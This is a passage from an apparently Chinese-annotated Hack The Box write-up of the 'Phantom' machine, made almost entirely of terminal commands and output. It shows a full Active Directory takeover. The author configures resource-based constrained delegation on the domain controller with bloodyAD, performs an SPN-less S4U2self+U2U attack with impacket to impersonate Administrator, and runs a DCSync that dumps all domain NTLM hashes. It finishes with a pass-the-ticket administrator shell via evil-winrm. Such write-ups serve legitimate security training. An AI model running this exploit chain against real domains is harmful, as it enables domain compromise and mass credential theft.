distinguishedName: CN=Rita Nichols,OU=IT,OU=PHANTOM,DC=phantom,DC=vl
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object WSILVA --attr servicePrincipalName
distinguishedName: CN=Willard Silva,OU=IT,OU=PHANTOM,DC=phantom,DC=vl
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object CROSE --attr servicePrincipalName
distinguishedName: CN=Chloe Rose,OU=IT,OU=PHANTOM,DC=phantom,DC=vl
三个角色都没有SPN,也没有权限修改他们的 servicePrincipalName 属性的值
这里经典的无SPN RBCD利用
首先在 DC$ 上配置 ntAllowedToActOnBehalfOfOtherIdentity 的值为一个我们知道明文密码的用户 这里就用 RNICHOLS 了
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object 'DC$' --resolve-sd
distinguishedName: CN=DC,OU=Domain Controllers,DC=phantom,DC=vl
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2025-10-26 14:43:12.684534+00:00
badPwdCount: 1
cn: DC
codePage: 0
countryCode: 0
dNSHostName: DC.phantom.vl
dSCorePropagationData: 2024-07-04 15:02:25+00:00
instanceType: 4
isCriticalSystemObject: True
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-10-26 13:32:05.981512+00:00
lastLogonTimestamp: 2025-10-26 13:02:41.809652+00:00
localPolicyFlags: 0
logonCount: 82
msDFSR-ComputerReferenceBL: CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=phantom,DC=vl
msDS-GenerationId: CVPPGsDxzfo=
msDS-SupportedEncryptionTypes: 28
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
>>>> nTSecurityDescriptor.ACL.0.Type: == ALLOWED_OBJECT ==
>>>> nTSecurityDescriptor.ACL.0.Trustee: ICT Security
>>>> nTSecurityDescriptor.ACL.0.Right: WRITE_PROP
>>>>>nTSecurityDescriptor.ACL.0.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
这里说明 ICT Security 组成员可以在 DC$ 上配置这个属性的值
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k add rbcd 'DC$' S-1-5-21-4029599044-1972224926-2225194048-1112
[!] No security descriptor has been returned, a new one will be created
[+] S-1-5-21-4029599044-1972224926-2225194048-1112 can now impersonate users on DC$ via S4U2Proxy
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# bloodyAD --host dc.phantom.vl -d phantom.vl -k get object 'DC$' --resolve-sd
distinguishedName: CN=DC,OU=Domain Controllers,DC=phantom,DC=vl
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 2025-10-26 14:43:12.684534+00:00
badPwdCount: 1
cn: DC
codePage: 0
countryCode: 0
dNSHostName: DC.phantom.vl
dSCorePropagationData: 2024-07-04 15:02:25+00:00
instanceType: 4
isCriticalSystemObject: True
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 2025-10-26 13:32:05.981512+00:00
lastLogonTimestamp: 2025-10-26 13:02:41.809652+00:00
localPolicyFlags: 0
logonCount: 82
msDFSR-ComputerReferenceBL: CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=phantom,DC=vl
>>>> msDS-AllowedToActOnBehalfOfOtherIdentity.Owner: BUILTIN_ADMINISTRATORS
msDS-AllowedToActOnBehalfOfOtherIdentity.Control: DACL_PRESENT|SELF_RELATIVE
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Type: == ALLOWED ==
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Trustee: S-1-5-21-4029599044-1972224926-2225194048-1112
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Right: CONTROL_ACCESS
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.ObjectType: Self
msDS-AllowedToActOnBehalfOfOtherIdentity.ACL.Flags: CONTAINER_INHERIT; OBJECT_INHERIT
这样就是配置好了
获取明文密码的哈希
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# python -c "password = 'Admin123'; import hashlib; print(hashlib.new('md4', password.encode('utf-16le')).hexdigest())"
e45a314c664d40a227f9540121d1a29d
然后用这个哈希请求TGT
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u RNICHOLS -H e45a314c664d40a227f9540121d1a29d --generate-tgt rhichols_hash
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\RNICHOLS:e45a314c664d40a227f9540121d1a29d
SMB 10.129.234.63 445 DC [+] TGT saved to: rhichols_hash.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=rhichols_hash.ccache
然后用 impacket-describeTicket 获取会话密钥
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-describeTicket rhichols_hash.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Number of credentials in cache: 1
[*] Parsing credential[0]:
[*] Ticket Session Key : e433109394a156b8ed64c905ce67409b
[*] User Name : RNICHOLS
[*] User Realm : PHANTOM.VL
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Start Time : 26/10/2025 11:03:36 AM
[*] End Time : 26/10/2025 21:03:36 PM
[*] RenewTill : 27/10/2025 11:03:33 AM
[*] Flags : (0x50e10000) forwardable, proxiable, renewable, initial, pre_authent, enc_pa_rep
[*] KeyType : rc4_hmac
[*] Base64(key) : 5DMQk5ShVrjtZMkFzmdAmw==
[*] Decoding unencrypted data in credential[0]['ticket']:
[*] Service Name : krbtgt/PHANTOM.VL
[*] Service Realm : PHANTOM.VL
[*] Encryption type : aes256_cts_hmac_sha1_96 (etype 18)
[-] Could not find the correct encryption key! Ticket is encrypted with aes256_cts_hmac_sha1_96 (etype 18), but no keys/creds were supplied
然后使用 impacket-changepasswd 把 RNICHOLS 的NT哈希改为这个TGT票据的会话密钥
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-changepasswd -newhashes :e433109394a156b8ed64c905ce67409b 'phantom.vl/RNICHOLS:Admin123@dc.phantom.vl' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of phantom.vl\RNICHOLS
[*] Connecting to DCE/RPC as phantom.vl\RNICHOLS
[*] Password was changed successfully.
[!] User might need to change their password at next logon because we set hashes (unless password never expires is set)
然后使用 impacket-getST 通过 S4U2self + U2U 获取TGS票据
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# impacket-getST -u2u -impersonate 'Administrator' -spn 'cifs/dc.phantom.vl' -k -no-pass 'phantom.vl'/'RNICHOLS'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache
然后 DCSync
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u administrator -k --use-kcache --ntds
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\administrator from ccache (Pwn3d!)
SMB 10.129.234.63 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.234.63 445 DC Administrator:500:aad3b435b51404eeaad3b435b51404ee:aa2abd9db4f5984e657f834484512117:::
SMB 10.129.234.63 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.129.234.63 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:de0c6c1bf90cdc90ed73c2b765793df6:::
SMB 10.129.234.63 445 DC phantom.vl\svc_sspr:1103:aad3b435b51404eeaad3b435b51404ee:8ecffccc2f22c1607b8e104296ffbf68:::
SMB 10.129.234.63 445 DC PHANTOM.vl\rnichols:1112:aad3b435b51404eeaad3b435b51404ee:e433109394a156b8ed64c905ce67409b:::
SMB 10.129.234.63 445 DC PHANTOM.vl\pharrison:1113:aad3b435b51404eeaad3b435b51404ee:744cc56188561af3c16a8d0cd1e758d1:::
SMB 10.129.234.63 445 DC PHANTOM.vl\wsilva:1114:aad3b435b51404eeaad3b435b51404ee:a481bb1b52c2a40fef6b9f0d22df5a7b:::
SMB 10.129.234.63 445 DC PHANTOM.vl\elynch:1115:aad3b435b51404eeaad3b435b51404ee:753389c36525eaa2182d2366e21cb37e:::
SMB 10.129.234.63 445 DC PHANTOM.vl\nhamilton:1116:aad3b435b51404eeaad3b435b51404ee:2d3aa57851c7686d3d3df4c2bf3ebbb8:::
SMB 10.129.234.63 445 DC PHANTOM.vl\lstanley:1117:aad3b435b51404eeaad3b435b51404ee:3945cd9505e0eca3621a4b61506a131a:::
SMB 10.129.234.63 445 DC PHANTOM.vl\bbarnes:1118:aad3b435b51404eeaad3b435b51404ee:8b86efbee20746efcf97d50081a7ada9:::
SMB 10.129.234.63 445 DC PHANTOM.vl\cjones:1119:aad3b435b51404eeaad3b435b51404ee:0253df7e458eedfc1b511ae1eadad057:::
SMB 10.129.234.63 445 DC PHANTOM.vl\agarcia:1120:aad3b435b51404eeaad3b435b51404ee:54199065e48fae91d67176d5d2c3d506:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ppayne:1121:aad3b435b51404eeaad3b435b51404ee:e628d1e4d23696da908acc1add7efbe4:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ibryant:1122:aad3b435b51404eeaad3b435b51404ee:ca996d2266c0e306701b78a06e3c29ab:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ssteward:1123:aad3b435b51404eeaad3b435b51404ee:5839c34d11b418846131f6944be80ca6:::
SMB 10.129.234.63 445 DC PHANTOM.vl\wstewart:1124:aad3b435b51404eeaad3b435b51404ee:1d2256228378d2093d25f5122981bcde:::
SMB 10.129.234.63 445 DC PHANTOM.vl\vhoward:1125:aad3b435b51404eeaad3b435b51404ee:fc97143b237f56c06e0d4f4bff1c7a09:::
SMB 10.129.234.63 445 DC PHANTOM.vl\crose:1126:aad3b435b51404eeaad3b435b51404ee:e9ad6ec6bd0ab88c16169b16114b216f:::
SMB 10.129.234.63 445 DC PHANTOM.vl\twright:1127:aad3b435b51404eeaad3b435b51404ee:f082f34b171dd47297674c2be83991b7:::
SMB 10.129.234.63 445 DC PHANTOM.vl\fhanson:1128:aad3b435b51404eeaad3b435b51404ee:3ecba7b39ce4b3fbe05362d6e05d31d0:::
SMB 10.129.234.63 445 DC PHANTOM.vl\cferguson:1129:aad3b435b51404eeaad3b435b51404ee:74bb37fa58020392821cdb89b5098f2d:::
SMB 10.129.234.63 445 DC PHANTOM.vl\alucas:1130:aad3b435b51404eeaad3b435b51404ee:53bd6a54d3dd605385e55f3226b0814d:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ebryant:1131:aad3b435b51404eeaad3b435b51404ee:abf123fca11a39c94bd92505f61c12a5:::
SMB 10.129.234.63 445 DC PHANTOM.vl\vlynch:1132:aad3b435b51404eeaad3b435b51404ee:c6837ff88c25daea76b0f390f7ab0552:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ghall:1133:aad3b435b51404eeaad3b435b51404ee:a1ca032e6023ddeedd9009d4c0a8c836:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ssimpson:1134:aad3b435b51404eeaad3b435b51404ee:1c029611755dfa697b1996f88a8d9c17:::
SMB 10.129.234.63 445 DC PHANTOM.vl\ccooper:1135:aad3b435b51404eeaad3b435b51404ee:fc35a773ba47633c4c1a807f91e9d496:::
SMB 10.129.234.63 445 DC PHANTOM.vl\vcunningham:1136:aad3b435b51404eeaad3b435b51404ee:c187274e5ff6a96c44bce6200d6e7944:::
SMB 10.129.234.63 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:648605bbb93c66d7754580cb850957fc:::
SMB 10.129.234.63 445 DC [+] Dumped 30 NTDS hashes to /root/.nxc/logs/ntds/10.129.234.63_None_2025-10-26_110927.ntds of which 29 were added to the database
SMB 10.129.234.63 445 DC [*] To extract only enabled accounts from the output file, run the following command:
SMB 10.129.234.63 445 DC [*] cat /root/.nxc/logs/ntds/10.129.234.63_None_2025-10-26_110927.ntds | grep -iv disabled | cut -d ':' -f1
SMB 10.129.234.63 445 DC [*] grep -iv disabled /root/.nxc/logs/ntds/10.129.234.63_None_2025-10-26_110927.ntds | cut -d ':' -f1
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# nxc smb 10.129.234.63 -u administrator -H aa2abd9db4f5984e657f834484512117 --generate-tgt administrator
SMB 10.129.234.63 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.234.63 445 DC [+] phantom.vl\administrator:aa2abd9db4f5984e657f834484512117 (Pwn3d!)
SMB 10.129.234.63 445 DC [+] TGT saved to: administrator.ccache
SMB 10.129.234.63 445 DC [+] Run the following command to use the TGT: export KRB5CCNAME=administrator.ccache
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# export KRB5CCNAME=administrator.ccache
┌──(root㉿kali)-[~/Desktop/htb/Phantom]
└─# evil-winrm-dev -i dc.phantom.vl -r phantom.vl
Evil-WinRM shell v3.8
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
phantom\administrator